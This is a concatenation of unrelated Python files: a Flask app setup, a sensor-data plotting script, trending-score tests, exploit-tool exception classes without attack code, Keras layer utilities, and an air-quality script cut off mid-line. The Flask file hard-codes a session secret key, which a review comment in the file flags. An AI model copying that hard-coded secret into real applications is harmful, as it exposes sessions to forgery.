    def __init__(self, reader: BinaryStream):
        # Deserialize the FText directly from the stream's current position.
        self.SupportedDesc = FText(reader)
|
from helpers.mockdbhelper import MockDBHelper
from flask import Flask, redirect, request, url_for, render_template
from htmlmin.main import minify
from application.mod_authentication.models import UserMix
from config import MOCK_TEST, DEBUG, APP_NAME
from helpers.dbhelper import DB as DB_CON
from helpers.loginhelper import LoginHelper
application = Flask(__name__)
# application.config.from_object('config')
# NOTE(review): the secret key is hard-coded in source; move it to config
# or an environment variable before deploying.
application.secret_key = "ahdgate26t237ahd82ejTqhd912y9uo1Yu3017jsyfuwye7rSFUGWUF45243"
# Use an in-memory mock DB under test, the real connection otherwise.
if MOCK_TEST:
    DB = MockDBHelper()
else:
    DB = DB_CON
print("looks hmm")
@application.before_request
def _connect_db():
    """Open the database connection before each request (real DB only)."""
    if MOCK_TEST:
        return
    DB.connect()
@application.teardown_request
def _close_db(exc=None):
    """Close the database connection after each request (real DB only).

    Flask passes the unhandled exception (or None) to teardown_request
    handlers; the original zero-argument signature would raise TypeError on
    every request teardown.  The default keeps direct calls working.
    """
    if not MOCK_TEST and not DB.is_closed():
        DB.close()
@application.after_request
def response_minify(response):
    """
    minify html response to decrease site traffic

    Only HTML responses are minified, and only outside DEBUG mode.
    (Removed the duplicated, unreachable `return response` the original had.)
    """
    if not DEBUG and response.content_type == u'text/html; charset=utf-8':
        response.set_data(
            minify(response.get_data(as_text=True))
        )
    return response
@application.errorhandler(401)
def unauthorized_page(e):
    """401 handler: send unauthenticated users to the login page.

    The original `next` URL is preserved so login can bounce back.
    (Removed the dead commented-out alternatives the original carried.)
    """
    print(str(e) + " : is here -->" + __file__)
    return redirect(url_for('mod_authentication.login', next=request.url))
@application.errorhandler(403)
def forbidden_page(e):
    """403 handler: render the forbidden page.

    Renamed from `unauthorized_page`, which shadowed the 401 handler of the
    same name (F811); Flask registers handlers at decoration time, so the
    rename does not change routing behaviour.
    """
    return render_template('403.html')
@application.context_processor
def custom_data_to_template():
    """Inject authentication status and the app name into every template."""
    # bool() reproduces the original if/else that stored literal True/False
    # based on the helper's truthiness.
    return {
        'is_authenticated': bool(LoginHelper.is_authenticated()),
        'app_name': APP_NAME,
    }
|
#####
# @brief Visualize a given dDCA dataset
#
# Python script to generate a SVG graph of the data of a given dDCA
# dataset via matplotlib. It generates one figure with three subplots:
# 1.) use case-related data (air/soil temperature/humidity)
# 2.) self-diagnostic data (fault indicators) & fault label
# 3.) danger/ safe indicator and resulting fault context
# The input file (CSV) format expected is:
# SNID, UNIX_timestamp, SNTIME,
# Tair, Tsoil, Hair, Hsoil,
# Xnt, Xvs, Xbat, Xart, Xrst, Xic, Xadc, Xusart,
# fault_label
# antigen, danger indicator, safe indicator, fault context
# Thereby, the first line contains the header and can be ignored.
#
# The ddca dataset has to be given as parameter, for example:
# => $ python3 visualize_ddca_dataset.py results/base_-_indoor_-_stable-ddca.csv 1
# where the 2nd parameter defines the transparency of the SVG output
#
# @file visualize_ddca_dataset.py
# @author Dominik Widhalm
# @version 1.0.0
# @date 2021/12/01
#####
##### LIBRARIES ########################
# For date/time
from datetime import datetime
from datetime import timedelta
# To handle the command line parameter
import sys
# directory/file functionality
import os
# To get filename without path and extension
from pathlib import Path
# CSV functionality
import csv
# for plotting
import matplotlib.pyplot as plt
plt.rcParams.update({'font.size': 12})
from matplotlib import rc
rc('mathtext', default='regular')
from matplotlib.ticker import (AutoLocator, AutoMinorLocator, MultipleLocator)
import matplotlib.dates as md
##### GLOBAL VARIABLES #####
# Output directory (created on demand below)
OUT_DIR = "plots/"
# Date/time format used when parsing/printing timestamps
fmt = '%Y-%m-%d %H:%M:%S'
# x-axis tick formatter: "HH:MM" over "month/day"
xfmt = md.DateFormatter('%H:%M\n%m/%d')
##### METHODS ##########################
# See https://www.codegrepper.com/code-examples/python/python+datetime+round+to+nearest+hour
def hour_rounder(t):
    """Round datetime *t* to the nearest hour (minute >= 30 rounds up).

    Seconds/microseconds are discarded before rounding, so e.g. 10:29:59
    still rounds down to 10:00.
    """
    floored = t.replace(minute=0, second=0, microsecond=0)
    return floored + timedelta(hours=t.minute // 30)
##### VISUALIZATION ####################
### Check input file
# Parameter given
if (len(sys.argv) < 2):
    print("ERROR: the script needs at least the input CSV file as parameter!")
    exit(-1)
# Correct extension
if not (str(sys.argv[1]).endswith('.csv') or str(sys.argv[1]).endswith('.CSV')):
    print("ERROR: CSV file expected as input!")
    exit(-1)
# Use given file as input
CSV_INPUT = str(sys.argv[1])
# Check if output directory exists (create it on demand)
if not os.path.exists(OUT_DIR):
    try:
        os.makedirs(OUT_DIR)
    except Exception as e:
        print("ERROR: Couldn't create directory for results ... aborting!")
        print(e)
        exit(-1)
# Base SVG filename on input filename
SVG_OUTPUT = OUT_DIR+Path(CSV_INPUT).stem + "-plot.svg"
# Use 2nd parameter for transparency (any non-zero integer => transparent SVG)
TRANSPARENT = None
if len(sys.argv) >= 3:
    TRANSPARENT = int(sys.argv[2])
else:
    TRANSPARENT = 0
### Get data from CSV file
### Prepare data arrays/lists/etc.
# general
snid = []
tstmp = []
time = []
sntime = []
# use case data
Tair = []
Tsoil = []
Hair = []
Hsoil = []
# fault indicator
Xnt = []
Xvs = []
Xbat = []
Xart = []
Xrst = []
Xic = []
Xadc = []
Xusart = []
# fault label
label = []
# DCA indicators
antigen = []
danger = []
safe = []
# Fault context
context = []
# Open the CSV input file (abort on failure, as before)
try:
    csv_f = open(CSV_INPUT, 'r')
except Exception:
    print("Cannot open the CSV input file \"%s\" ... aborting!" % CSV_INPUT)
    exit(-1)
# `with` guarantees the handle is closed — the original never closed it.
with csv_f:
    csv_i = csv.reader(csv_f, delimiter=',')
    for line_count, row in enumerate(csv_i):
        # skip the header line
        if line_count == 0:
            continue
        ### META DATA ###
        snid.append(str(row[0]))
        tmp = int(row[1])
        tstmp.append(tmp)
        time.append(datetime.utcfromtimestamp(tmp))
        sntime.append(int(row[2]))
        ### USE CASE DATA ###
        Tair.append(round(float(row[3]), 2))
        Tsoil.append(round(float(row[4]), 2))
        Hair.append(round(float(row[5]), 2))
        Hsoil.append(round(float(row[6]), 2))
        ### FAULT INDICATOR ###
        Xnt.append(round(float(row[7]), 2))
        Xvs.append(round(float(row[8]), 2))
        Xbat.append(round(float(row[9]), 2))
        Xart.append(round(float(row[10]), 2))
        Xrst.append(round(float(row[11]), 2))
        Xic.append(round(float(row[12]), 2))
        Xadc.append(round(float(row[13]), 2))
        Xusart.append(round(float(row[14]), 2))
        ### FAULT LABEL ###
        label.append(int(row[15]))
        ### dDCA DATA ###
        antigen.append(str(row[16]))
        danger.append(round(float(row[17]), 2))
        safe.append(round(float(row[18]), 2))
        ### FAULT CONTEXT ###
        context.append(int(row[19]))
### Plot the data via matplotlib
# get lowest (first) and highest (last) time
x_first = hour_rounder(time[0])
x_last = hour_rounder(time[-1])
# prepare figure: 3 stacked subplots; ax1/ax3 get twin y-axes for the
# second unit (humidity resp. fault context)
fig = plt.figure(figsize=(15,8), dpi=300, tight_layout=True)
ax1 = fig.add_subplot(311)
ax1b = ax1.twinx()
ax2 = fig.add_subplot(312)
ax3 = fig.add_subplot(313)
ax3b = ax3.twinx()
### use case data ###
# grid
ax1.grid(which='major', color='#CCCCCC', linestyle=':')
# x-axis (tick labels hidden; shared time range with the other subplots)
ax1.set_xlim(x_first,x_last)
ax1.xaxis.set_major_locator(AutoLocator())
ax1.xaxis.set_minor_locator(AutoMinorLocator(2))
ax1.set_xticklabels([])
ax1b.set_xlim(x_first,x_last)
ax1b.set_xticklabels([])
# y-axis: temperature on the left, relative humidity on the right twin
ax1.set_ylabel(r"temperature [$^{\circ}$C]")
ax1.set_ylim(0,50)
ax1.spines['top'].set_visible(False)
ax1.spines['right'].set_visible(False)
ax1.yaxis.set_major_locator(MultipleLocator(10))
ax1.yaxis.set_minor_locator(AutoMinorLocator(2))
ax1b.set_ylabel("relative humidity [%]")
ax1b.set_ylim(0,100)
ax1b.spines['top'].set_visible(False)
ax1b.spines['left'].set_visible(False)
ax1b.xaxis.set_ticks_position('bottom')
ax1b.spines['bottom'].set_position(('data',0))
ax1b.yaxis.set_ticks_position('right')
ax1b.yaxis.set_major_locator(MultipleLocator(20))
ax1b.yaxis.set_minor_locator(AutoMinorLocator(2))
# plot data (combined legend across both y-axes)
lns1 = ax1.plot(time, Tair, '-', label=r"$T_{air}$", color="darkgreen")
lns2 = ax1.plot(time, Tsoil, '-', label=r"$T_{soil}$", color="limegreen")
lns3 = ax1b.plot(time, Hair, '-', label=r"$H_{air}$", color="darkblue")
lns4 = ax1b.plot(time, Hsoil, '-', label=r"$H_{soil}$", color="dodgerblue")
lns = lns1+lns2+lns3+lns4
labs = [l.get_label() for l in lns]
ax1b.legend(lns, labs, ncol=4, loc='lower center', facecolor='white', framealpha=1)
### indicator plot ###
# grid
ax2.grid(which='major', color='#CCCCCC', linestyle=':')
# x-axis (tick labels hidden here too)
ax2.set_xlim(x_first,x_last)
ax2.xaxis.set_major_locator(AutoLocator())
ax2.xaxis.set_minor_locator(AutoMinorLocator(2))
ax2.set_xticklabels([])
# y-axis: normalized fault indicators in [0, 1]
ax2.set_ylabel("fault indicators")
ax2.set_ylim(0,1.1)
ax2.yaxis.set_major_locator(MultipleLocator(0.2))
ax2.yaxis.set_minor_locator(AutoMinorLocator(2))
ax2.spines['top'].set_visible(False)
ax2.spines['right'].set_visible(False)
# plot data: one line per self-diagnostic fault indicator
ax2.plot(time, Xnt, '-', label=r"$\chi_{NT}$", color="midnightblue")
ax2.plot(time, Xvs, '-', label=r"$\chi_{VS}$", color="darkgreen")
ax2.plot(time, Xbat, '-', label=r"$\chi_{BAT}$", color="rosybrown")
ax2.plot(time, Xart, '-', label=r"$\chi_{ART}$", color="orangered")
ax2.plot(time, Xrst, '-', label=r"$\chi_{RST}$", color="fuchsia")
ax2.plot(time, Xic, '-', label=r"$\chi_{IC}$", color="lime")
ax2.plot(time, Xadc, '-', label=r"$\chi_{ADC}$", color="aqua")
ax2.plot(time, Xusart, '-', label=r"$\chi_{USART}$", color="gold")
ax2.legend(framealpha=1, ncol=8, loc='upper center')
### DCA plot ###
# grid
ax3.grid(which='major', color='#CCCCCC', linestyle=':')
# x-axis: only this bottom subplot shows the formatted time labels
ax3.set_xlim(x_first,x_last)
ax3.xaxis.set_major_locator(AutoLocator())
ax3.xaxis.set_minor_locator(AutoMinorLocator(2))
ax3.set_xticklabels([])
ax3b.set_xlim(x_first,x_last)
ax3b.xaxis.set_major_locator(AutoLocator())
ax3b.xaxis.set_minor_locator(AutoMinorLocator(2))
ax3b.set_xlabel('time [H:M]')
ax3b.xaxis.set_major_formatter(xfmt)
# y-axis: danger/safe indicators left, binary fault context right twin
ax3.set_ylabel("danger/fault indicators")
ax3.set_ylim(0,1.1)
ax3.spines['top'].set_visible(False)
ax3.spines['right'].set_visible(False)
ax3.yaxis.set_major_locator(MultipleLocator(0.2))
ax3.yaxis.set_minor_locator(AutoMinorLocator(2))
ax3b.set_ylabel("fault context")
ax3b.set_ylim(0,1.1)
ax3b.spines['top'].set_visible(False)
ax3b.spines['left'].set_visible(False)
ax3b.xaxis.set_ticks_position('bottom')
ax3b.spines['bottom'].set_position(('data',0))
ax3b.yaxis.set_ticks_position('right')
ax3b.yaxis.set_major_locator(MultipleLocator(0.2))
ax3b.yaxis.set_minor_locator(AutoMinorLocator(2))
# plot data (combined legend across both y-axes)
lns1 = ax3.plot(time, danger, '-', label="danger", color="red")
lns2 = ax3.plot(time, safe, '-', label="safe", color="green")
lns3 = ax3b.plot(time, context, '-', label="fault context", linewidth=1, color="darkorchid")
lns4 = ax3b.plot(time, label, '-', label="fault label", linewidth=1, color="cornflowerblue")
lns = lns1+lns2+lns3+lns4
labs = [l.get_label() for l in lns]
ax3b.legend(lns, labs, loc='center right', facecolor='white', framealpha=1)
### Finish figure: save as SVG (transparency per CLI flag), then clean up
if TRANSPARENT:
    plt.savefig(SVG_OUTPUT, transparent=True)
else:
    plt.savefig(SVG_OUTPUT, transparent=False)
plt.cla()
plt.clf()
plt.close()
|
from . import config_folder
|
import logging
from datetime import datetime, timedelta
from src.models import TrackTrendingScore, TrendingParam, AggregateIntervalPlay
from src.utils.db_session import get_db
from src.tasks.generate_trending import generate_trending
from src.trending_strategies.aSPET_trending_tracks_strategy import (
TrendingTracksStrategyaSPET,
)
from src.trending_strategies.ePWJD_trending_tracks_strategy import (
TrendingTracksStrategyePWJD,
)
from tests.utils import populate_mock_db
logger = logging.getLogger(__name__)
# Setup trending from simplified metadata
def setup_trending(db):
    """Seed the mock DB with the fixture used by the trending tests.

    Users, tracks, follows, plays, reposts, and saves are created with
    timestamps offset from now() so the week/month/year interval
    aggregates have known counts that the tests assert against.
    """
    # Test data
    # test tracks
    # when creating tracks, track_id == index
    test_entities = {
        "users": [
            *[
                {
                    "user_id": i + 1,
                    "handle": str(i + 1),
                    "wallet": str(i + 1),
                    "profile_picture": "Qm0123456789abcdef0123456789abcdef0123456789ab",
                    "cover_photo": "Qm0123456789abcdef0123456789abcdef0123456789ab",
                    "bio": "filled in",
                }
                for i in range(20)
            ]
        ],
        "tracks": [
            {"track_id": 1, "owner_id": 1},
            {
                "track_id": 2,
                "owner_id": 1,
                "created_at": datetime.now() - timedelta(days=1),
            },
            {
                "track_id": 3,
                "owner_id": 2,
                "created_at": datetime.now() - timedelta(weeks=2),
            },
            {
                "track_id": 4,
                "owner_id": 2,
                "created_at": datetime.now() - timedelta(weeks=6),
            },
            {
                "track_id": 5,
                "owner_id": 2,
                "created_at": datetime.now() - timedelta(weeks=60),
            },
            {"track_id": 6, "owner_id": 2},
            {"track_id": 7, "owner_id": 3},
            # deleted/unlisted tracks must be excluded from trending params
            {"track_id": 8, "owner_id": 3, "is_delete": True},
            {"track_id": 9, "owner_id": 3, "is_unlisted": True},
        ],
        "follows": [
            # at least 200 followers for user_0
            *[{"follower_user_id": 3 + i, "followee_user_id": 1} for i in range(10)],
            *[{"follower_user_id": 3 + i, "followee_user_id": 2} for i in range(15)],
            *[
                {"follower_user_id": 3 + i, "followee_user_id": 3} for i in range(2)
            ],  # Less than 3 followers, so 0 trending score
        ],
        "plays": [
            # recent plays (counted in the week interval) ...
            *[{"item_id": 1, "owner_id": 1} for i in range(10)],
            *[{"item_id": 2, "owner_id": 1} for i in range(12)],
            *[{"item_id": 3, "owner_id": 2} for i in range(13)],
            *[{"item_id": 4, "owner_id": 2} for i in range(14)],
            *[{"item_id": 5, "owner_id": 2} for i in range(15)],
            *[{"item_id": 6, "owner_id": 2} for i in range(16)],
            *[{"item_id": 7, "owner_id": 3} for i in range(17)],
            # ... plus older plays at month/year/beyond-year offsets
            *[
                {"item_id": 1, "created_at": datetime.now() - timedelta(weeks=3)}
                for i in range(10)
            ],
            *[
                {"item_id": 1, "created_at": datetime.now() - timedelta(weeks=50)}
                for i in range(10)
            ],
            *[
                {"item_id": 1, "created_at": datetime.now() - timedelta(weeks=80)}
                for i in range(10)
            ],
            *[
                {"item_id": 2, "created_at": datetime.now() - timedelta(weeks=2)}
                for i in range(10)
            ],
            *[
                {"item_id": 3, "created_at": datetime.now() - timedelta(weeks=2)}
                for i in range(10)
            ],
            *[
                {"item_id": 4, "created_at": datetime.now() - timedelta(weeks=4)}
                for i in range(10)
            ],
            *[
                {"item_id": 5, "created_at": datetime.now() - timedelta(weeks=5)}
                for i in range(10)
            ],
            *[
                {"item_id": 6, "created_at": datetime.now() - timedelta(weeks=6)}
                for i in range(10)
            ],
        ],
        "reposts": [
            *[{"repost_item_id": 1, "user_id": i + 1} for i in range(13)],
            *[
                {
                    "repost_item_id": 1,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=2),
                }
                for i in range(20)
            ],
            *[
                {
                    "repost_item_id": 1,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=30),
                }
                for i in range(30)
            ],
            *[{"repost_item_id": 2, "user_id": i + 1} for i in range(24)],
            *[{"repost_item_id": 3, "user_id": i + 1} for i in range(25)],
            *[{"repost_item_id": 4, "user_id": i + 1} for i in range(26)],
            *[{"repost_item_id": 5, "user_id": i + 1} for i in range(27)],
            *[{"repost_item_id": 6, "user_id": i + 1} for i in range(28)],
            *[{"repost_item_id": 7, "user_id": i + 1} for i in range(29)],
            *[
                {
                    "repost_item_id": 2,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=2),
                }
                for i in range(23)
            ],
            *[
                {
                    "repost_item_id": 3,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=2),
                }
                for i in range(23)
            ],
            *[
                {
                    "repost_item_id": 4,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=4),
                }
                for i in range(23)
            ],
            *[
                {
                    "repost_item_id": 5,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=5),
                }
                for i in range(23)
            ],
            *[
                {
                    "repost_item_id": 6,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=6),
                }
                for i in range(23)
            ],
        ],
        "saves": [
            *[{"save_item_id": 1, "user_id": i + 1} for i in range(4)],
            *[
                {
                    "save_item_id": 1,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=3),
                }
                for i in range(8)
            ],
            *[
                {
                    "save_item_id": 1,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=50),
                }
                for i in range(16)
            ],
            *[
                {
                    "save_item_id": 1,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=60),
                }
                for i in range(1)
            ],
            *[{"save_item_id": 2, "user_id": i + 1} for i in range(44)],
            *[{"save_item_id": 3, "user_id": i + 1} for i in range(44)],
            *[{"save_item_id": 4, "user_id": i + 1} for i in range(44)],
            *[{"save_item_id": 5, "user_id": i + 1} for i in range(44)],
            *[{"save_item_id": 6, "user_id": i + 1} for i in range(44)],
            *[{"save_item_id": 7, "user_id": i + 1} for i in range(44)],
            *[
                {
                    "save_item_id": 2,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=2),
                }
                for i in range(44)
            ],
            *[
                {
                    "save_item_id": 3,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=2),
                }
                for i in range(44)
            ],
            *[
                {
                    "save_item_id": 4,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=4),
                }
                for i in range(44)
            ],
            *[
                {
                    "save_item_id": 5,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=5),
                }
                for i in range(44)
            ],
            *[
                {
                    "save_item_id": 6,
                    "user_id": i + 1,
                    "created_at": datetime.now() - timedelta(weeks=6),
                }
                for i in range(44)
            ],
        ],
    }
    populate_mock_db(db, test_entities)
# Tests
def test_update_interval_plays(app):
    """Test that refreshing aggregate_interval_plays gives the correct values"""
    with app.app_context():
        db = get_db()

    # Seed the database with the shared trending fixture.
    setup_trending(db)

    with db.scoped_session() as session:
        session.execute("REFRESH MATERIALIZED VIEW aggregate_interval_plays")
        rows = session.query(AggregateIntervalPlay).all()

        # One row per valid (non-deleted, listed) track.
        assert len(rows) == 7

        track_plays = next((row for row in rows if row.track_id == 1), None)
        assert track_plays.week_listen_counts == 10
        assert track_plays.month_listen_counts == 20
        assert track_plays.year_listen_counts == 30
def test_update_trending_params(app):
    """Test that refreshing trending params gives the correct values"""
    with app.app_context():
        db = get_db()
    # setup: populate the mock db with the shared trending fixture
    setup_trending(db)
    with db.scoped_session() as session:
        # NOTE(review): trending_params presumably reads from the aggregate
        # views, hence it is refreshed last -- confirm against the view DDL.
        session.execute("REFRESH MATERIALIZED VIEW aggregate_user")
        session.execute("REFRESH MATERIALIZED VIEW aggregate_track")
        session.execute("REFRESH MATERIALIZED VIEW aggregate_plays")
        session.execute("REFRESH MATERIALIZED VIEW aggregate_interval_plays")
        session.execute("REFRESH MATERIALIZED VIEW trending_params")
        trending_params = session.query(TrendingParam).all()
        # Test that trending_params are not generated for hidden/deleted tracks
        # There should be 7 valid tracks with trending params
        assert len(trending_params) == 7

        # helper: look up the params row for a track id (None if absent)
        def get_track_id(track_id):
            for param in trending_params:
                if param.track_id == track_id:
                    return param
            return None

        t1 = get_track_id(1)
        assert t1.play_count == 40
        assert t1.owner_follower_count == 10
        assert t1.repost_count == 63
        assert t1.repost_week_count == 13
        assert t1.repost_month_count == 33
        assert t1.repost_year_count == 63
        assert t1.save_count == 29
        assert t1.save_week_count == 4
        assert t1.save_month_count == 12
        assert t1.save_year_count == 28
        # user 1 has 10 followers
        # user 2 has 15 followers
        # user 3 has 2 followers
        # 3 saves from all 3 users
        # 4 reposts from user 1
        # 3 reposts from users 2, 3
        # -> (3 * 10 + 3 * 15 + 3 * 2) + (4 * 10 + 3 * 15 + 3 * 2) = 172
        assert float(t1.karma) == 172
def test_update_track_score_query(app):
    """Happy path test: test that we get all valid listens from prior year.

    Compares the updated strategy's materialized scores against the scores
    produced on the fly by the previous strategy.
    """
    with app.app_context():
        db = get_db()
    # setup: populate the mock db with the shared trending fixture
    setup_trending(db)
    # fixed local typo: was `udpated_strategy`
    prev_strategy = TrendingTracksStrategyePWJD()
    updated_strategy = TrendingTracksStrategyaSPET()
    with db.scoped_session() as session:
        session.execute("REFRESH MATERIALIZED VIEW aggregate_user")
        session.execute("REFRESH MATERIALIZED VIEW aggregate_track")
        session.execute("REFRESH MATERIALIZED VIEW aggregate_plays")
        session.execute("REFRESH MATERIALIZED VIEW aggregate_interval_plays")
        session.execute("REFRESH MATERIALIZED VIEW trending_params")
        updated_strategy.update_track_score_query(session)
        scores = session.query(TrackTrendingScore).all()
        # Test that scores are not generated for hidden/deleted tracks
        # There should be 7 valid tracks * 3 valid time ranges (week/month/year)
        assert len(scores) == 21

        def get_time_sorted(time_range):
            # scores for one time range, highest (score, track_id) first
            return sorted(
                [score for score in scores if score.time_range == time_range],
                key=lambda k: (k.score, k.track_id),
                reverse=True,
            )

        week_scores = get_time_sorted("week")
        month_scores = get_time_sorted("month")
        year_scores = get_time_sorted("year")
        assert len(week_scores) == 7
        assert len(month_scores) == 7
        assert len(year_scores) == 7
        # Check that the type and version fields are correct
        # (this loop was previously duplicated verbatim; one pass suffices)
        for score in scores:
            assert score.type == updated_strategy.trending_type.name
            assert score.version == updated_strategy.version.name

        def get_old_trending(time_range):
            # score the same tracks with the previous strategy for comparison
            genre = None
            old_trending_params = generate_trending(
                session, time_range, genre, 10, 0, prev_strategy
            )
            track_scores = [
                prev_strategy.get_track_score(time_range, track)
                for track in old_trending_params["listen_counts"]
            ]
            # Re-apply the limit just in case we did decide to include more tracks in the scoring than the limit
            sorted_track_scores = sorted(
                track_scores, key=lambda k: (k["score"], k["track_id"]), reverse=True
            )
            return sorted_track_scores

        previous_week_trending = get_old_trending("week")
        for idx, updated_score in enumerate(week_scores):
            assert previous_week_trending[idx]["track_id"] == updated_score.track_id
            assert round(previous_week_trending[idx]["score"], 2) == round(
                updated_score.score, 2
            )
        previous_month_trending = get_old_trending("month")
        for idx, updated_score in enumerate(month_scores):
            assert previous_month_trending[idx]["track_id"] == updated_score.track_id
            assert round(previous_month_trending[idx]["score"], 2) == round(
                updated_score.score, 2
            )
        previous_year_trending = get_old_trending("year")
        for idx, updated_score in enumerate(year_scores):
            assert previous_year_trending[idx]["track_id"] == updated_score.track_id
            assert round(previous_year_trending[idx]["score"], 2) == round(
                updated_score.score, 2
            )
|
class VulnerabilityNotTrigger(Exception):
    """Raised when an attempted exploit does not trigger the target
    vulnerability (name-derived; raising callers are outside this chunk)."""
    pass
class ExecutionError(Exception):
    """Raised on a generic failure while executing the target
    (name-derived; raising callers are outside this chunk)."""
    pass
class AbnormalGDBBehavior(Exception):
    """Raised when GDB behaves unexpectedly during a debug session
    (name-derived; raising callers are outside this chunk)."""
    pass
class InvalidCPU(Exception):
    """Raised for an unsupported/unknown CPU architecture
    (name-derived; raising callers are outside this chunk)."""
    pass
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import keras
from keras.layers import LSTM, Bidirectional, GRU
from dlpy.utils import DLPyError
''' Keras-specific utilities '''
def remove_layer_wrapper(layer):
    '''
    Determines underlying layer type for wrapped layers

    Parameters
    ----------
    layer : Layer object
        Current layer object

    Returns
    -------
    string
        class name of wrapped layer
    list of layer objects
        unwrapped layer object(s)
    '''
    class_name = layer.__class__.__name__.lower()
    # check for layer wrappers
    sublayers = []
    if class_name == 'timedistributed':
        layer_info = layer.get_config()['layer']
        layer_info['config']['name'] = layer.name
        class_name = layer_info['class_name'].lower()
        if class_name == 'dense':
            sublayers.append(keras.layers.Dense(**layer_info['config']))
        else:
            raise DLPyError(class_name + ' is an unsupported time distributed '
                            'layer type - model conversion failed')
    elif class_name == 'bidirectional':
        layer_info = layer.get_config()['layer']
        class_name = layer_info['class_name'].lower()
        # forward direction, then backward direction; the RNN dispatch was
        # previously duplicated verbatim for both -- factored into a helper
        layer_info['config']['name'] = layer.forward_layer.name
        layer_info['config']['go_backwards'] = False
        sublayers.append(_make_rnn_sublayer(class_name, layer_info['config']))
        layer_info['config']['name'] = layer.backward_layer.name
        layer_info['config']['go_backwards'] = True
        sublayers.append(_make_rnn_sublayer(class_name, layer_info['config']))
    else:
        sublayers.append(layer)
    # Must return sublayers in reverse order if CUDNN is used.
    # This aligns the Viya layer mapping with the CUDNN layer
    # mapping.
    if layer.__class__.__name__.lower() == 'bidirectional':
        sublayer_info = layer.get_config()['layer']
        if sublayer_info['class_name'].lower() in ['cudnnlstm', 'cudnngru']:
            sublayers.reverse()
    return class_name, sublayers


# lowercase class name -> keras.layers attribute name for supported RNN types
_RNN_LAYER_TYPES = {
    'lstm': 'LSTM',
    'gru': 'GRU',
    'simplernn': 'SimpleRNN',
    'cudnnlstm': 'CuDNNLSTM',
    'cudnngru': 'CuDNNGRU',
}


def _make_rnn_sublayer(class_name, config):
    '''
    Instantiate one direction of a bidirectional RNN from its config.

    Attribute lookup stays lazy (getattr) so keras builds lacking the CuDNN
    classes fail only when such a layer is actually requested, matching the
    original inline dispatch.
    '''
    if class_name not in _RNN_LAYER_TYPES:
        # error text kept identical to the original dispatch
        raise DLPyError(class_name + ' is an unsupported time distributed '
                        'layer type - model conversion failed')
    return getattr(keras.layers, _RNN_LAYER_TYPES[class_name])(**config)
def create_cpu_compatible_layer(layer, model_type='CNN'):
    '''
    Creates a new layer object using parameters from the
    provided layer

    Parameters
    ----------
    layer : Layer object
        Current layer object
    model_type : string, optional
        Current model type (one of 'CNN' or 'RNN')

    Returns
    -------
    Layer object
    '''
    # only RNN models may contain CUDNN layers needing CPU-safe replacements
    if model_type != 'RNN':
        return layer

    wrapped = layer.__class__.__name__ == 'Bidirectional'
    inner = layer.forward_layer if wrapped else layer
    config = inner.get_config()
    kind = inner.__class__.__name__

    if kind == 'CuDNNLSTM':
        replacement = LSTM(config['units'],
                           return_sequences=config['return_sequences'],
                           return_state=False,
                           unit_forget_bias=config['unit_forget_bias'],
                           stateful=False,
                           activation='tanh',
                           recurrent_activation='sigmoid')
    elif kind == 'CuDNNGRU':
        replacement = GRU(config['units'],
                          return_sequences=config['return_sequences'],
                          return_state=False,
                          stateful=False,
                          reset_after=True)
    else:
        # nothing CUDNN-specific: hand back the original layer untouched
        return layer

    # re-wrap when the original was bidirectional
    if wrapped:
        return Bidirectional(replacement, merge_mode='concat')
    return replacement
|
from . import dcosauth
from . import dcosawsstack
from . import dcosawssg
from . import dcosdnsalias
|
import bayesnewton
import objax
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import pandas as pd
from sklearn.preprocessing import StandardScaler
from convertbng.util import convert_bng
import time
def datetime_to_epoch(datetime):
    """
    Converts a pandas datetime column to integer seconds since the Unix epoch.

    args:
        datetime: is a pandas column (datetime64[ns] values)

    Fix: divide by the integer 10**9, not the float 1e9. Nanosecond int64
    values (~1.5e18) exceed float64's exact-integer range (2**53), so the
    previous float floor-division could lose precision near second
    boundaries; integer division stays exact.
    """
    return datetime.astype('int64') // 10**9
# ---- data loading & preprocessing -------------------------------------
species = 'pm10'  # which pollutant column of the LAQN data to model

raw_data = pd.read_csv('../data/aq_data.csv')
sites_df = pd.read_csv('../data/laqn_sites.csv', sep=';')

# filter sites not in london
london_box = [
    [51.279, 51.684],  # lat
    [-0.533, 0.208]  # lon
]
sites_df = sites_df[(sites_df['Latitude'] > london_box[0][0]) & (sites_df['Latitude'] < london_box[0][1])]
sites_df = sites_df[(sites_df['Longitude'] > london_box[1][0]) & (sites_df['Longitude'] < london_box[1][1])]

# merge spatial information to data
raw_data = raw_data.merge(sites_df, left_on='site', right_on='SiteCode')

# convert to datetimes
raw_data['date'] = pd.to_datetime(raw_data['date'])
raw_data['epoch'] = datetime_to_epoch(raw_data['date'])

# get data in date range
data_range_start = '2019/02/18 00:00:00'
data_range_end = '2019/02/25 23:59:59'  # '2019/03/11 23:59:59', '2019/02/25 23:59:59', '2019/04/17 23:59:59'
raw_data = raw_data[(raw_data['date'] >= data_range_start) & (raw_data['date'] < data_range_end)]

# inputs: (epoch seconds, lon, lat); outputs: pollutant readings
X = np.array(raw_data[['epoch', 'Longitude', 'Latitude']])
Y = np.array(raw_data[[species]])

# convert to easting and northings
british_national_grid_coords = convert_bng(X[:, 1], X[:, 2])
X = np.vstack([X[:, 0],
